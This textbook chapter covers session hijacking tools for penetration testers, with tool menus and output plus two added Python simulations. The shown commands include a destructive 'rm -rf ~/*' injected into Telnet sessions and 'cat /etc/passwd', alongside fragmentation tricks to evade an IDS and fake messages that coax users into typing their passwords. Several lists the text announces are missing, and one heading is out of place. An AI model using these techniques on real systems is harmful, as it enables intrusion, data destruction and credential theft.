Penetration Testing and Network Defense
Now that you have learned about the theory behind session hijacking, it is time to learn about a few tools used in session hijacking attacks. This section discusses the following tools: Juggernaut, Hunt, TTY-Watcher, and T-Sight.
Juggernaut
Juggernaut, like most session hijacking tools, is a Linux-based tool. It was written by someone with the handle 'route' and was first introduced in volume 7, issue 50 of Phrack Magazine. You can view this posting, which includes the source code, at http://www.phrack.org/show.php?p=50&a=6. Juggernaut is an older tool, yet it is still popular for some of its unique features. One feature that makes Juggernaut popular is its capability to watch all traffic or to watch only traffic that contains a particular keyword (such as password). The malicious hacker or penetration tester can watch all sessions and pick the one that he or she wants to hijack. Another benefit of Juggernaut is the choice between a traditional interactive session hijack and a simplex connection hijack. A simplex hijack is called a simple hijack by many tools. It allows you to inject a single command into a Telnet stream, such as cat /etc/passwd to grab the account list from a Linux host (on a modern system the password hashes themselves live in /etc/shadow, which only root can read). Injecting a few single commands is less noticeable than a full session hijack, increasing the chances that your attack goes unnoticed. The final benefit of Juggernaut is its built-in packet assembly function, which enables you to create your own packet with the header flags set any way you like. This advanced feature is useful in unique situations, such as when you want to create a custom packet that is fragmented into multiple segments. Some intrusion detection systems (IDSs) and firewalls do not reassemble fragmented packets before inspecting them, so you can use this option to craft packets that bypass some security devices.

When you launch Juggernaut from a Linux command line, you see the menu in Example 6-1.

Example 6-1. Juggernaut Menu
Juggernaut
?) Help
0) Program information
1) Connection database
2) Spy on a connection
3) Reset a connection
4) Automated connection reset daemon
5) Simplex connection hijack
6) Interactive connection hijack
7) Packet assembly module
8) Souper sekret option number eight
9) Step down
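The fragmentation trick mentioned above is worth seeing in bytes. The following is an added example, not the book's code and not Juggernaut's packet assembly module: it builds an IPv4/TCP packet carrying the injected command from Example 6-3 using only the Python standard library, splits it into fragments the way a packet assembler would, and runs two toy signature matchers over the result. The addresses and ports are taken from Example 6-2; the IP identification, the sequence numbers, the 44-byte MTU, the signature, and both matchers are assumptions made for the illustration.

```python
"""IP fragmentation of a hand-built TCP segment, and why a signature matcher
that inspects packets one at a time misses data that straddles a fragment
boundary. Added illustration; it is not the Juggernaut packet assembly module
and nothing is sent on the wire."""

import socket
import struct

IP_MF = 0x2000  # "More Fragments" bit in the IPv4 flags/fragment-offset field


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum of 16-bit words, complemented."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def ipv4_header(src, dst, proto, payload_len, ident, flags_frag) -> bytes:
    """20-byte IPv4 header without options; the checksum is filled in last."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, ident,
                      flags_frag, 64, proto, 0, src, dst)
    return hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]


def tcp_segment(src, dst, sport, dport, seq, ack, payload, flags=0x18) -> bytes:
    """TCP header (no options, PSH|ACK by default) plus data, with the
    checksum computed over the IPv4 pseudo-header as a receiver would."""
    hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags,
                      0xFFFF, 0, 0)
    pseudo = src + dst + struct.pack("!BBH", 0, 6, len(hdr) + len(payload))
    csum = checksum(pseudo + hdr + payload)
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:] + payload


def fragment(src, dst, proto, transport, ident, mtu) -> list:
    """Split a transport PDU into IP packets of at most `mtu` bytes. Every
    piece but the last must be a multiple of 8 bytes because the offset field
    counts 8-byte units. A small mtu leaves the TCP header and a few data
    bytes in the first fragment and the rest of the data in the next."""
    chunk = (mtu - 20) // 8 * 8
    if chunk <= 0:
        raise ValueError("mtu leaves no room for an 8-byte fragment")
    packets = []
    for off in range(0, len(transport), chunk):
        piece = transport[off:off + chunk]
        flags_frag = (IP_MF if off + chunk < len(transport) else 0) | off // 8
        packets.append(ipv4_header(src, dst, proto, len(piece), ident, flags_frag) + piece)
    return packets


def reassemble(packets) -> bytes:
    """Rebuild one fragment set. No timeouts and no overlap policy, which are
    exactly the parts a real IDS reassembler must get right."""
    pieces, end = {}, None
    for pkt in packets:
        flags_frag = struct.unpack("!H", pkt[6:8])[0]
        off = (flags_frag & 0x1FFF) * 8
        pieces[off] = pkt[20:]
        if not flags_frag & IP_MF:
            end = off + len(pkt) - 20
    data = b""
    for off in sorted(pieces):
        if off != len(data):
            raise ValueError("hole in fragment set")
        data += pieces[off]
    if len(data) != end:
        raise ValueError("last fragment missing")
    return data


def naive_ids(packets, signature: bytes) -> bool:
    """Stateless matcher: looks for the signature inside each packet alone."""
    return any(signature in pkt[20:] for pkt in packets)


def reassembling_ids(packets, signature: bytes) -> bool:
    """Stateful matcher: reassembles first, then looks past the TCP header."""
    return signature in reassemble(packets)[20:]


def run_example() -> dict:
    # Addresses and ports follow Example 6-2 and the command Example 6-3;
    # the IP ID, sequence numbers and MTU are arbitrary choices.
    src, dst = socket.inet_aton("10.18.12.99"), socket.inet_aton("10.18.12.15")
    seg = tcp_segment(src, dst, 1033, 23, 0x1000, 0x2000, b"rm -rf ~/*\r\n")
    frags = fragment(src, dst, 6, seg, ident=0x4242, mtu=44)  # 24 bytes per piece
    sig = b"rm -rf"
    return {
        "fragment_count": len(frags),
        "header_checksum_ok": checksum(frags[0][:20]) == 0,
        "naive_hit": naive_ids(frags, sig),
        "reassembled_hit": reassembling_ids(frags, sig),
        "roundtrip": reassemble(frags) == seg,
    }
```

Calling run_example() gives two fragments: the first carries the whole TCP header and only "rm -" of the data, the second carries "rf ~/*\r\n". The per-packet matcher reports nothing while the reassembling one finds the command, which is why an IDS must reassemble fragments (and settle its overlap and timeout policy) before matching, and why a perimeter filter should drop fragments too small to hold a complete transport header.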
The connection database option (1) shows you active sessions. Note that in a switched environment, you cannot see other hosts' sessions unless you have configured port monitoring (a SPAN or mirror port) on the switch. In Example 6-2, you can see that two Telnet sessions (destination TCP port 23) are open to 10.18.12.15. You can spy on a connection with option 2, which lets you monitor all activity between the two hosts. You also have the option to log the traffic to a file; by default, no logging is performed.

Example 6-2. Using Juggernaut to View Active Telnet Sessions
Current Connection Database:
------------------------------------------
ref #    source                target
(1)      10.18.12.99 [1033]    10.18.12.15 [23]
(2)      10.18.12.15 [1241]    10.18.12.15 [23]

Choose a connection [q] >1
Do you wish to log to a file as well? [y/N] >y

Spying on connection, hit 'ctrl-c' when done.
Spying on connection: 10.18.12.99 [1033] --> 10.18.12.15 [23]

/$cd ~/Documents
/home/Dayna/Documents$ls
1stQrtrReport.doc Payroll.xls
$

One of the drawbacks of Juggernaut is that passwords typed in the monitored session do not show up in the spy output on your computer. You can use another packet sniffer of your choosing (such as Ethereal, now Wireshark) to view this information. To perform a simple hijack, choose option 5, which enables you to enter a single command that is sent to the target. This is the option least likely to get you detected. Example 6-3 shows a command that erases all files in the home directory of the user after you choose the connection.

Example 6-3. Simplex Hijack: Executing a Single Command on a Target
Choose a connection [q] >1
Enter the command string you wish executed [q] > rm -rf ~/*

Spying on connection, hit 'ctrl-c' when you want to hijack.
NOTE: This may cause an ACK storm until client is RST.

Spying on connection: 10.18.12.99 [1033] --> 10.18.12.15 [23]

Take the ACK storm warning seriously: once the server accepts the injected bytes, the real client and the server no longer agree on sequence numbers, and each answers the other's out-of-order segments with duplicate ACKs until one side resets the connection. Following is a description of the other options available with Juggernaut:
Hunt
Hunt, created by Pavel Krauz and available at http://packetstorm.linuxsecurity.com/sniffers/hunt/, has many similarities to Juggernaut. Like Juggernaut, it runs on Linux, enables you to watch all TCP traffic, and gives you the choice between a full interactive session hijack and a simple hijack. One of the advantages of Hunt over Juggernaut is its capability to resynchronize the connection and hand it back after you are done with the hijack. You can return control to the originating host which, if done soon enough, can make the session go completely unnoticed by the host and target. Juggernaut, on the other hand, requires you to perform a DoS attack on the host. That attack not only drops the connection to the target, but it also prevents all communication of the host on the network. This in turn prompts the user to contact the help desk, raising suspicion of a possible attack. By returning control to the host, Hunt avoids this problem: the temporary loss of communication to the target looks like a network "glitch" that others quickly forget about. After you launch Hunt, you see the menu in Example 6-4.

Example 6-4. Hunt Menu
l/w/r) list/watch/reset connections
u) host up tests
a) arp/simple hijack (avoids ack storm if arp is used)
s) simple hijack
d) daemons rst/arp/sniff/mac
o) options
x) exit
*>
The selections do the following:
Example 6-5 shows a hijack of an active Telnet session.

Example 6-5. Using Hunt to Hijack an Active Telnet Session
/*
 *      Hunt 1.0
 *      multipurpose connection intruder / sniffer for Linux
 *      1998 by kra - http://www.rootshell.com
 */
starting hunt
--- Main Menu --- rcvpkt 0, free/alloc pkt 63/64
l/w/r) list/watch/reset connections
u) host up
a) arp/simple hijack (avoids ack storm if arp used)
s) simple hijack
d) daemons rst/arp/sniff/mac
o) options
x) exit
- [ http://www.rootshell.com/ ] -
> a
0) 10.12.18.99 [1421] --> 10.12.18.15 [23]
1) 10.12.18.134 [1049] --> 10.12.18.15 [23]
choose conn> 0
arp spoof src in dst y/n [y]> y
src MAC [EA:1A:DE:AD:BE:03]>
dst MAC [EA:1A:DE:AD:BE:04]>
dump connection y/n [y]> n
press key to take over connection
CTRL-] to break
rm -rf ~/*
[r]reset connection/[s]ynchronize/[n]one [r]> s
user have to type 12 characters and print 29 characters to synchronize connection
CTRL-C to break
Done
In this example, a simple hijack is performed against the 10.12.18.99 host as it connects to the 10.12.18.15 computer via Telnet (destination TCP port 23). Executing the rm -rf ~/* command deletes all files in the home directory of that user. To properly synchronize the sequence numbers, Hunt might send a message to the user asking for additional characters to pad the communication with additional bytes. In the output given in Example 6-5, the user is prompted to type 12 characters with the following message:

msg from root: power failure - try to type 12 chars

The two counts are the two halves of the desynchronization: the server has accepted 12 bytes (the 10-character command plus the carriage return and line feed) that the client never sent, so the client's sequence number is 12 bytes behind what the server expects, and the server has replied with 29 bytes that the client never received, so the client's acknowledgment number is 29 bytes behind. This message is one of the major drawbacks of Hunt, because most UNIX and Linux users would recognize it as abnormal behavior and report it to their administrator. The administrator (after reading this book) would know that this message was sent by Hunt and would begin investigating the source of the attack. Still, some Linux and UNIX users might not think much of the message and would do as it says, padding the data so that the sequence numbers stay synchronized.

TTY-Watcher
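Both the ACK storm warning in Example 6-3 and the "type 12 characters and print 29 characters" message in Example 6-5 come from the same sequence-number arithmetic. The following added example, which is not code from Juggernaut, Hunt or the book, models that arithmetic with two endpoints reduced to their send and receive counters. The endpoints and the injected command follow Example 6-5; the initial sequence numbers, the 29-byte server reply, and the way the notice is padded to the gap are assumptions made for the illustration.

```python
"""Sequence-number bookkeeping behind a simplex (single-command) hijack and a
Hunt-style resynchronization. Added illustration, not code from Juggernaut or
Hunt: TCP is reduced to the send/receive counters of each side and nothing is
put on the wire."""

from dataclasses import dataclass


@dataclass
class Endpoint:
    """The two TCP control-block counters that matter for a hijack."""
    name: str
    snd_nxt: int  # next sequence number this side will send
    rcv_nxt: int  # next sequence number this side expects from its peer


@dataclass
class Segment:
    src: str
    dst: str
    seq: int
    ack: int
    payload: bytes


def send(src: Endpoint, dst: Endpoint, payload: bytes) -> Segment:
    """A genuine segment, stamped with the sender's counters, which advance."""
    seg = Segment(src.name, dst.name, src.snd_nxt, src.rcv_nxt, payload)
    src.snd_nxt += len(payload)
    return seg


def spoof(victim: Endpoint, dst: Endpoint, payload: bytes) -> Segment:
    """What the hijacking tool emits: the victim's address and the seq/ack it
    learned by sniffing. The victim's own counters do not move; that gap is
    the desynchronization."""
    return Segment(victim.name, dst.name, victim.snd_nxt, victim.rcv_nxt, payload)


def deliver(seg: Segment, receiver: Endpoint) -> bool:
    """Strict in-order receive. A segment whose seq is not rcv_nxt is dropped;
    real TCP answers it with a duplicate ACK, and two desynchronized peers
    doing that to each other is the ACK storm Juggernaut warns about."""
    if seg.seq != receiver.rcv_nxt:
        return False
    receiver.rcv_nxt += len(seg.payload)
    return True


def lag(client: Endpoint, server: Endpoint) -> tuple:
    """(bytes the client must still send, bytes the client must still receive)
    before both sides agree on sequence numbers again."""
    return server.rcv_nxt - client.snd_nxt, server.snd_nxt - client.rcv_nxt


def simplex_hijack(client: Endpoint, server: Endpoint, command: bytes,
                   server_reply: bytes) -> dict:
    """Inject one command as the client. The attacker, sitting in the path
    (ARP spoofing in Hunt's case), reads the reply and does not forward it."""
    out = {"injected_accepted": deliver(spoof(client, server, command), server)}
    reply = send(server, client, server_reply)  # consumed by the attacker
    out["reply_ack_ahead_of_client"] = reply.ack - client.snd_nxt
    # The user's next genuine keystroke carries a stale seq and is dropped.
    probe = Segment(client.name, server.name, client.snd_nxt, client.rcv_nxt, b"l")
    out["genuine_rejected"] = not deliver(probe, server)
    out["lag"] = lag(client, server)
    return out


def hunt_resync(client: Endpoint, server: Endpoint, notice: bytes) -> tuple:
    """Hunt's [s]ynchronize: the user is told to type `typed` characters, which
    the tool swallows instead of forwarding, and the tool prints `printed`
    bytes to the user's terminal with the seq the client expects. Padding or
    cutting the notice to exactly the gap is a simplification of this model."""
    typed, printed = lag(client, server)
    send(client, server, b"x" * typed)  # the user's keystrokes, never delivered
    text = (notice + b" " * printed)[:printed]
    deliver(Segment(server.name, client.name, client.rcv_nxt, client.snd_nxt, text), client)
    return typed, printed


def run_example() -> dict:
    # Endpoints and command follow Example 6-5; the initial sequence numbers
    # and the 29-byte reply (Telnet echo plus a prompt) are constructed.
    client = Endpoint("10.12.18.99:1421", snd_nxt=1000, rcv_nxt=5000)
    server = Endpoint("10.12.18.15:23", snd_nxt=5000, rcv_nxt=1000)
    command = b"rm -rf ~/*\r\n"  # 12 bytes as the Telnet client would send them
    reply = b"rm -rf ~/*\r\n" + b"/home/Dayna/Docs$"  # 29 bytes
    out = simplex_hijack(client, server, command, reply)
    out["typed"], out["printed"] = hunt_resync(
        client, server, b"msg from root: power failure - try to type 12 chars")
    out["synced_after"] = lag(client, server) == (0, 0)
    return out
```

run_example() reports that the server accepted the injected command, that the client's next genuine segment was rejected, a lag of (12, 29) matching Hunt's message, and that after the swallowed keystrokes and the printed notice both counters agree again. The same arithmetic is what a detection engineer can key on: a burst of duplicate ACKs with acknowledgment numbers ahead of anything the client has sent is the wire-level signature of an injection without resynchronization.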
TTY-Watcher (available at http://www.engarde.com/software/) is different from Hunt and Juggernaut in that it monitors and hijacks sessions on a single system rather than on the network. At press time, TTY-Watcher works only on Sun Solaris systems. When users are logged in to the Solaris system, all data from their terminal (TTY) session is copied over to your TTY window. Figure 6-4 shows this process.

Figure 6-4. TTY-Watcher Operation
TTY-Watcher also has the option of sending a message to the user. The message could be something like this:

Your connection has logged out. Please enter your password again.
Login:
Of course, when the user enters the password at the command line, he receives an error because his shell interprets the password as a command, and because his TTY is being copied, the password shows up in your window in clear text. This is only an example of what can happen with the send feature; the possibilities are limited only by your imagination.

T-Sight
T-Sight is a commercial tool developed by Engarde (http://www.engarde.com/software/) that runs on Windows platforms. It was originally designed as a security tool to monitor your network for suspicious activity. All communication is copied in real time, giving you accurate output of the data being transmitted on your network. However, in the process of monitoring, you can hijack a session. Because of this intrusive option, Engarde licenses its software only to predetermined IP addresses. You can view a tutorial of T-Sight at http://www.engarde.com/software/t-sight/tutorial/realtime/index.php.

Other Tools
The tools mentioned in this chapter are only a sample of software and code available to perform session hijacking. Other tools include the following: